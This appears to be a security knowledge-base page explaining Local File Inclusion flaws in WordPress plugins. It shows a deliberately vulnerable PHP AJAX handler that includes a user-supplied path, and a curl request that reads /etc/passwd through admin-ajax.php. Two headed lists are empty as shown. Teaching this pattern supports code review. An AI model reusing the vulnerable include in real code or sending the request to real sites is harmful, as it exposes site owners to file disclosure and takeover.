Skip to content

Local File Inclusion (LFI)


This article covers cases of possible LFI on WordPress. This includes improper file inclusion inside of the plugin/theme which can be used to gain RCE on the server.

Useful Functions

Several functions could be useful to identify a possible LFI vulnerability:

Example Cases

Below is an example of vulnerable code:

add_action("wp_ajax_nopriv_render_lesson", "render_lesson_template");
function render_lesson_template(){
$template_path = urldecode( $_GET['template_path'] ?? '' );
// For custom template return all list of lessons
include $template_path;

To exploit this, any unauthenticated user just needs to perform a POST request to the /wp-admin/admin-ajax.php endpoint specifying the needed parameter to trigger the include function.

Terminal window
curl <WORDPRESS_BASE_URL>/wp-admin/admin-ajax.php?action=render_lesson&template_path=/etc/passwd

Below are some of the findings related to Local File Inclusion: